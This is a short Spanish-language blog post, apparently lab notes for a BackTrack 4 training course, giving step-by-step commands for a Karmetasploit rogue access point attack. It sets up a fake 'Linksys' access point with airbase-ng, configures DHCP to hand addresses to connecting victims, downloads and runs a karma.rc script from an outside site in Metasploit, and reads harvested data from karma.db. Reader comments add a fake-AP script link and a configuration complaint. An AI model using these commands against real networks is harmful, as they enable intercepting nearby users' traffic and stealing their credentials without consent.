Actualizando algunos labs del COMBAT training para BackTrack 4, aquí les dejo algunas notas para jugar con Karmetasploit.
- Ponemos la placa en modo monitor:
airmon-ng start wlan0
- Levantamos el Access Point falso en la interfaz en modo
monitor:
airbase-ng -P -C 30 -e “Linksys” -v mon0
- Configuramos el rango de IPs que entregara el servidor
DHCP:
nano /etc/dhcp3/dhcpd.conf
option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.140 10.0.0.240;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}
- Configuramos la IP en la interfaz que creo airbase-ng:
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
- Levantamos el DHCP que le entregara las IPs a las
victimas que se conecten al Access Point falso:
/etc/init.d/dhcp3-server start
- Vemos las IPs que entrega el DHCP:
tail -f /var/log/messages
- Bajamos el script de Karma y corremos Metasploit:
cd /pentest/exploits/framework3
wget http://digitaloffense.net/tools/karma.rc
./msfconsole -r karma.rc
- Podemos obtener los datos guardados en karma.db
de esta forma:
sqlite3 karma.db
.tables
select * from notes;
.quit
3 comentarios:
podrías aprovechar y dar acceso a internet a los "usuarios" con un servidor dns y una regla en las iptables. Hace tiempo hice un script para crear puntos de acceso y dar conexión a los "usuarios": http://opensec.es/2009/10/05/creando-un-punto-de-acceso-falso-ii/
PD: buen blog ;)
Hola sch3ma!
Muy interesante el script que hiciste, sin dudas voy a estar jugando con eso este fin de semana ;)
Saludos!
leo
La verda lo he intentado de todas las formas, con dnsmasq y con dhcp3-server, y no logro que el servidor le asigne direccion al cliente :(
Publicar un comentario